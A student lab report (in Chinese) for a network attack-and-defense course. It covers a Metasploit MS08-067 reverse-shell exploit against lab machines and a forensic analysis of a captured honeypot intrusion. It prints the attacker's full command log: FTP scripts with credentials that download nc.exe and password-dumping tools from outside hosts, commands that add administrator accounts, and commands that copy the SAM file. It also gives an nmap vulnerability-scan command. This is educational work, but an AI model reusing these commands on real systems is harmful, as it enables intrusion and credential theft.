20222944 2022-2023-2 《网络攻防实践》实践六报告

1.实践内容

1.1 动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

1.2 取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。

1.3 团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1 实践环境

攻击机：Windows XP，包含Metasploit软件，
密码为：mima1234
输入ipconfig查看IP地址：192.168.200.5

靶机：Windows 2000 Server，
密码为：mima1234
输入ipconfig查看IP地址：192.168.200.124

Metaspoitable Linux，
账户/密码msfadmin/msfadmin 提权输入命令sudo su
输入ifconfig查看IP地址：192.168.200.123

2.2 远程渗透统计实验

在Windows XP攻击机上打开Metasploit 3.

等待加载，完成后显示的界面是一个基于Bash的命令行界面，如下所示：

运行命令search ms08_067，查询ms08_067漏洞的详细信息。

运行命令use windows/smb/ms08_067_netapi，进入漏洞所在文件。然后运行命令show options，查看可用选项。


输入命令：
set payload generic/shell_reverse_tcp，设置载荷
set RHOST 192.168.200.124，（Windows 2000 Server的IP地址）设置目标主机
set LHOST 192.168.200.5，（Windows XP的IP地址）设置攻击主机

输入命令exploit进行攻击。

可以发现，运行exploit后，攻击机成功盗取了目标主机的访问权限。

如果在这里的命令行中输入ipconfig，可发现“该主机”的IP地址变为192.168.200.124了。

利用wireshark抓包分析可得该渗透攻击的攻击机和靶机，还有建立连接的端口。

追踪TCP流，可以看到靶机中输入的命令行和返回的信息被抓取。

2.2 取证分析实践

使用wireshark打开附件中的demo_NT_attack_data 压缩包中的snort-0204@0117.log文件。

筛选数据包：在wireshark上方的筛选输入框中输入筛选条件：ip.addr==172.16.1.106 and http，然后追踪一个info中有%C0%AF的包的TCP流（如下图中的第117号包）。


我们可以从追踪的包中找到包含/…%C0%AF…/的字符，说明攻击者利用了IIS Unicode漏洞进行了攻击。

追踪第149号数据流，可以看到出现了类似于shell(“cmd /c echo”)的字符，说明攻击者通过shell指令对目标进行操作，进一步分析得知，还利用了RDS漏洞允许任意代码执行的缺陷进行了操作。
进一步，可总结得出以下指令：

#第一段：攻击者拿到系统的访问权限
shell("cmd /c echo werd >> c:\fun")
shell("cmd /c echo user johna2k > ftpcom")
shell("cmd /c echo hacker2000 >> ftpcom")
shell("cmd /c echo get samdump.dll >> ftpcom")
shell("cmd /c echo get pdump.exe >> ftpcom")
shell("cmd /c echo get nc.exe >> ftpcom")
shell("cmd /c echo quit >> ftpcom")
shell("cmd /c ftp -s:ftpcom -n www.nether.net")
shell("cmd /c pdump.exe >> newpass")
shell("cmd /c echo user johna2k > ftpcom2")
shell("cmd /c echo hacker2000 >> ftpcom2")
shell("cmd /c put newpass >> ftpcom2")
shell("cmd /c echo quit >> ftpcom2")
shell("cmd /c ftp -s:ftpcom2 -n www.nether.net")
shell("cmd /c ftp -s:ftpcom2 -n www.nether.net")
shell("cmd /c ftp 213.116.251.162")
shell("cmd /c echo open 213.116.251.162 > ftpcom")
shell("cmd /c echo johna2k > ftpcom")
shell("cmd /c echo hacker2000 >> ftpcom")
shell("cmd /c echo get samdump.dll >> ftpcom")
shell("cmd /c echo get pdump.exe >> ftpcom")
shell("cmd /c echo get nc.exe >> ftpcom")
shell("cmd /c echo quit >> ftpcom")
shell("cmd /c ftp -s:ftpcom")

#第二段：向212.139.12.26和213.116.251.162写入了nc.exe文件
shell("cmd /c open 212.139.12.26")
shell("cmd /c echo johna2k >>sasfile")
shell("cmd /c echo haxedj00 >>sasfile")
shell("cmd /c echo get pdump.exe >>sasfile")
shell("cmd /c echo get samdump.dll >>sasfile")
shell("cmd /c echo get nc.exe >>sasfile")
shell("cmd /c echo quit >>sasfile")
shell("cmd /c ftp -s:sasfile")
shell("cmd /c open 213.116.251.162")
shell("cmd /c echo johna2k >>sasfile")
shell("cmd /c echo haxedj00 >>sasfile")
shell("cmd /c echo get pdump.exe >>sasfile")
shell("cmd /c echo get samdump.dll >>sasfile")
shell("cmd /c echo get nc.exe >>sasfile")
shell("cmd /c echo quit >>sasfile")
shell("cmd /c ftp -s:sasfile")

#第三段：写入破解的口令
shell("cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >>yay.txt")
shell("cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt")
shell("cmd /c pdump.exe >> c:\yay.txt")
shell("cmd /c net session >>yay2.txt")
shell("cmd /c net session >>c:\yay2.txt")
shell("cmd /c net users >>heh.txt")
shell("cmd /c net users >>c:\heh.txt")
shell("cmd /c net localgroup Domain Admins IWAM_KENNY /ADD")
shell("cmd /c net localgroup Domain Admins IUSR_KENNY /ADD")
shell("cmd /c net localgroup administrators IUSR_KENNY /ADD")
shell("cmd /c net localgroup administrators IWAM_KENNY /ADD")
shell("cmd /c net user testuser UgotHacked /ADD")
shell("cmd /c net localgroup Administrators testuser /ADD")

#第四段：创建SAM文件副本
shell("cmd /c rdisk -/s")
shell("cmd /c rdisk -s")
shell("cmd /c rdisk")
shell("cmd /c rdisk -s/")
shell("cmd /c rdisk -s/")
shell("cmd /c rdisk /s-")
shell("cmd /c rdisk /s-")
shell("cmd /c rdisk /s-")

#第五段：删除和拷贝har.txt文件
shell("cmd /c type c:\winnt\repair\sam._ >>c:\har.txt")
shell("cmd /c del c:\inetpub\wwwroot\har.txt")
shell("cmd /c del c:\inetpub\wwwroot\har.txt")
shell("cmd /c net user IWAM_KENNY Snake69Snake69")

攻击者使用了什么破解工具进行攻击？
上述指令均采用了Microsoft Access Driver (*.mdb)的驱动，使用了c:\winnt\help\iis\htm\tutorial\btcustmr.mdb这个dbq文件。根据ADM!ROX!YOUR!WORLD这个特征字符串，查询得知攻击者应该是利用了由rain forest puppy所编写的 msadc(2).pl渗透攻击代码发起的攻击。

攻击者如何使用这个破解工具进入并控制了系统？
观察发现，每一次的攻击时间都很短，可见攻击者应该是先将指令写入了shell脚本，然后将这个脚本与msadc.pl攻击脚本一起执行的。
由上面的第一段shell命令可以看出，攻击者打开主机后，使用FTP的方式下载文件，使用samdunp拿到口令，再利用pdump.exe破解。在第四次破解，也就是打开IP地址为213.116.251.162的主机后，攻击者成功拿到了访问权限。

攻击者获得系统访问权限后做了什么？
攻击者获得了IWAM_KENNY和IUSR_KENNY的账号，并试图获取本地Administrator用户权限。
为此，攻击者将破解的口令写入了yay.txt中，将用户写入到hec.txt文件中。还试图删除和拷贝har.txt文件。

我们如何防止这样的攻击？
1.设置强口令，增大破解口令的难度。
2.定期检测以及修复漏洞，及时安装补丁。

你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？
追踪174号TCP流tcp.stream eq 174，发现攻击者发送了这样一段命令：

echo best honeypot i’ve seen till now : ) > rfp.txt

2.3 Windows系统远程渗透攻击和分析

远程渗透和分析的步骤参照2.2节，这里不再一一赘述了。
PS：如何检测靶机的漏洞？
这里以靶机为Metasploitable Windows XP（IP地址为192.168.200.5）为例，在装有nmap的攻击机（如Kali Linux攻击机，IP地址为192.168.200.128）中输入并运行命令nmap -T4 -A -v --script vuln 192.168.200.5。
过一会即可检测到漏洞及其信息。

靶机有致命漏洞ms17_010

3.学习中遇到的问题及解决

无

4.实践总结

随着网络攻击和防御技术的日益演进，新型的网络攻击方式层出不穷，给网络安全带来了极大的挑战。
我们在使用操作系统时，一定要及时更新安全补丁，以及时防御对手的攻击。